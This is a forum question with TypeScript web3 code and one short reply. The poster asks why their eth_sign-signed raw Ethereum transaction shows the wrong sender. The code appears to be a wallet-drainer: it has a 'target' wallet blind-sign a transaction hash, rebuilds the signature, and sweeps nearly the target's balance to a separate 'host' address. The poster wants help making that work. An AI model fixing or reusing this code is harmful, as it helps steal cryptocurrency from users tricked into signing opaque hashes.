Why does my from address changes when signing an eth_sign transaction
I need help with something. I am trying to create a transaction, sign it, and send the transaction with web3, but every time it gets signed, the from address changes to a random address.
After much evaluation and testing on my wallet without including the private key, I realized it only works when nonce is zero. But whenever it is a higher nonce such as 54, it generates a random from wallet address.
import Transaction from "ethereumjs-tx";
import { toast } from "react-toastify";

const hashTx = (hash: any) => {
  const tx = new Transaction(hash);
  return tx;
};

  await web3.eth
    .getTransactionCount(target, "pending")
    .then(async (nonce1: any) => {
      const gasPrice: bigint = await web3.eth.getGasPrice();
      const gasLimit: bigint = 22000n;
      const txFee: bigint = BigInt(Math.floor(Number(gasPrice) * 1.666));
      const funds: bigint = BigInt(10000000000000000n - txFee * gasLimit);
      const chainId: bigint = await web3.eth.getChainId();
      const minEth: bigint = 1000000000000000n;

      if (getBalance > minEth && getBalance > txFee && host) {
        const tx_ = {
          from: myAddr,
          to: host,
          nonce: web3.utils.toHex(nonce1),
          gasLimit: web3.utils.toHex(21000n), // gasLimit
          gasPrice: web3.utils.toHex(txFee),
          value: web3.utils.toHex(funds),
          data: "0x",
          v: "0x1", // original
          r: "0x",
          s: "0x",
        };

        const tx = hashTx(tx_);
        const serializedTx = "0x" + tx.serialize().toString("hex");
        const sha3_: string = web3.utils.sha3(serializedTx)!;
        console.log("rawTx1:", serializedTx);
        console.log("rawHash1:", sha3_);

        await web3.eth
          .sign(sha3_, target)
          .then(async (signed: any) => {
            const temporary = signed.substring(2),
              r_ = "0x" + temporary.substring(0, 64),
              s_ = "0x" + temporary.substring(64, 128),
              rhema = parseInt(temporary.substring(128, 130), 16),
              v_ = web3.utils.toHex(rhema + Number(chainId) * 2 + 8);

            console.log("r:", r_);
            console.log("s:", s_);
            console.log("y:", v_);

            tx.r = r_;
            tx.s = s_;
            tx.v = v_;

            console.log(tx);
            console.log("---------------------------------------------");

            const txFin = "0x" + tx.serialize().toString("hex"); //,
            const sha3__ = web3.utils.sha3(txFin);

            console.log("rawTx:", txFin);
            console.log("rawHash:", sha3__);

            await web3.eth
              .sendSignedTransaction(txFin)
              .then((elisebeth: any) => {
                console.log(elisebeth);
                toast.success("Successful Attempt");
              })
              .catch((vannette: any) => {
                console.log(vannette)
              });
          })
          .catch((heide: any) => {
            toast.error("Failed To Process Request");
            console.log(heide);
          });
      } else {
        toast.error("Doesn't Meet Requirements.");
      }

After every hashing process, gives and insufficient balance prompt.

It’s possibly due to the incorrect r, s, v values. Can you share the minimum reproducible code (just using JS instead of TS), showcasing the generation of random from address?
